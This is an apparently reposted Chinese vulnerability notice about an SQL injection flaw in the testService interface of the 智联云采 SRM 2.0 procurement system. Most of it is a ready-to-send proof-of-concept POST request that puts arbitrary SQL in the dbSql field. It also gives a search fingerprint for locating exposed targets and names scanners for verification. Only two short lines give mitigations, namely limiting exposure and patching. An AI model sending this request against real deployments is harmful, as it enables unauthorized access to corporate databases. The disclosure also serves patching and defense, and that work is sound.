title=="SRM 2.0"
POST /adpweb/a/ica/api/testService HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/json
{
"dbId": "1001",
"dbSql": "#set ($lang = $lang) SELECT * FROM v$version",
"responeTemplate": "{"std_data": {"execution": {"sqlcode": "$execution.sqlcode", "description": "$execution.description"}}}",
"serviceCode": "q",
"serviceName": "q",
"serviceParams": "{"lang":"zh_CN"}"
}
sqlmap验证
nuclei
afrog
xray
1、关闭互联网暴露面或接口设置访问权限
2、关注厂商及时更新补丁或升级至安全版本
原文始发于微信公众号(nday POC):智联云采 SRM2.0 testService SQL注入漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论